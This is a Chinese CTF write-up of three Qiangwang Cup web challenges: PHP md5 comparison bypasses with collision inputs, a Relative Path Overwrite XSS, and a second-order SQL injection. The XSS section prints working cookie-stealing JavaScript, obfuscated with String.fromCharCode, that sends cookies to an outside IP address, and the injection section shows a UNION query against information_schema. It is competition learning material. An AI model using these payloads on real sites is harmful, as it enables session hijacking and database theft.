强网杯web部分writeup

几道web的题解

web签到

这道题的思路应该是php特性一路做下去,源码隐藏在了注释中
最后要使用md5碰撞的知识

1
2
if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
die("success!");

弱类型比较时,0e开头的md5值会被php识别为科学记数法
QNKCDZO和240610708进行MD5运算后都为0e开头
然后其实就是把弱类型变成了强类型比较

1
2
if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
die("success!");

因为MD5(数组)=null,所以可以传入两个数组
要将参数param变为param[]即可

1
2
if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
die("success!);

限制了传入类型,只有md5碰撞了
以下是payload,md5碰撞参考

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
from binascii import unhexlify

data1 = {
'param1':'QNKCDZO',
'param2':'240610708'
}

data2 = {
'param1[]':'1.0',
'param2[]':'1'
}
data3 = {
'param1' : b'Oded Goldreich\nOded Goldreich\nOded Goldreich\nOded Go' +
unhexlify('d8050d0019bb9318924caa96dce35cb835b349e144e98c50c22cf461244a4
064bf1afaecc5820d428ad38d6bec89a5ad51e29063dd79b16cf67c12978647f5af123de3acf844085cd025b956'),
'param2' : b'Neal Koblitz\nNeal Koblitz\nNeal Koblitz\nNeal Koblitz\n' +
unhexlify('75b80e0035f3d2c909af1baddce35cb835b349e144e88c50c22cf461244a40e
4bf1afaecc5820d428ad38d6bec89a5ad51e29063dd79b16cf6fc11978647f5af123de3acf84408dcd025b956')
}


url = "http://39.107.33.96:10000/index.php"

n = requests.session()
n.cookies.clear()
r = n.get(url)
r = n.post(url,data = data1)
r = n.get(url)
r = n.post(url,data = data2)
r = n.get(url)
r = n.post(url,data = data3)
print(r.text)

吐槽一下…其实有md5碰撞直接就能把前面两个过了,所以感觉前两个考点很鸡肋

share your mind

这里要用到RPO攻击

  • RPO(Relative Path Overwrite)相对路径覆盖,是一种新型攻击技术,最早由Gareth Heyes在其发表的文章中提出。主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞,通过一些技巧,我们可以通过相对路径来引入其他的资源文件,以至于达成我们想要的目的。
    RPO攻击参考链接

index.php中以相对路径加载了js
src=”static/js/jquery.min.js”,考虑RPO攻击,且文章页面可控。写入alert(1)
构造url http://39.107.33.96:20000/index.php/view/article/2702/..%2f..%2f..%2f
弹窗成功image
尝试打一下cookie

1
str='window.open(\'http://182.254.221.239:8081/'+document.cookie+'\')';eval(str);

因为过滤了尖括号,使用String.fromCharCode可以绕过

1
2
3
eval(String.fromCharCode(115,116,114,61,39,119,105,110,100,111,119,46,111,112,101,110,40,92,39,
104,116,116,112,58,47,47,49,56,50,46,50,53,52,46,50,50,49,46,50,51,57,58,56,48,56,49,47,39,43,
100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,39,92,39,41,39,59,101,118,97,108,40,115,116,114,41,59))

提交 http://39.107.33.96:20000/index.php/view/article/2739/..%2f..%2f..%2f
这里服务器解析的地址为http://39.107.33.96:20000/index.php,js加载地址为 http://39.107.33.96:20000/index.php/view/article/2739/static/js/jquery.min.js
服务器会将它解析为 http://39.107.33.96:20000/index.php/view/article/2739 从而返回2739的文章内容,而且被当作js执行。
在服务器上用nc监听端口
得到一个hint
image
HINT=Try to get the cookie of path /QWB_fl4g/QWB/
直接用ifarm过去读cookie就可以

1
2
3
var i =document.createElement("iframe");
i.setAttribute("src","/QWB_fl4g/QWB/");document.body.appendChild(i);
i.addEventListener("load",function(){var content = i.contentWindow.document.cookie; location='//182.254.221.239:8081/'+btoa(content); },false);

这个payload或许更好理解一点

1
2
3
4
5
6
7
8
var i=document.createElement("iframe");
i.src="/QWB_fl4g/QWB/";
i.id="a";
document.body.appendChild(i);
i.onload = function (){
var c=document.getElementById('a').contentWindow.document.cookie;
location.href="http://182.254.221.239:8081"+c;
}

同理使用String.fromCharCode

1
2
3
4
5
6
7
8
9
eval(String.fromCharCode(118,97,114,32,105,32,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,
69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,32,105,46,115,101,116,65,116,116,114,105,
98,117,116,101,40,34,115,114,99,34,44,34,47,81,87,66,95,102,108,52,103,47,81,87,66,47,34,41,59,100,111,
99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,105,41,59,32,105,
46,97,100,100,69,118,101,110,116,76,105,115,116,101,110,101,114,40,34,108,111,97,100,34,44,102,117,110,99,
116,105,111,110,40,41,123,118,97,114,32,99,111,110,116,101,110,116,32,61,32,105,46,99,111,110,116,101,110,
116,87,105,110,100,111,119,46,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,32,108,111,99,97,
116,105,111,110,61,39,47,47,49,56,50,46,50,53,52,46,50,50,49,46,50,51,57,58,56,48,56,49,47,39,43,98,116,111,
97,40,99,111,110,116,101,110,116,41,59,32,125,44,102,97,108,115,101,41,59))

提交 http://39.107.33.96:20000/index.php/view/article/2740/..%2f..%2f..%2f
image
Base64解码一下 flag=QWB{flag_is_f43kth4rpo}

three hits

一个简单的二次注入,注意limit的使用
9999999 and 1 =2 union select 1,(select table_name from information_schema.tables where table_schema=’qwb’ limit 0,1),3,4–
image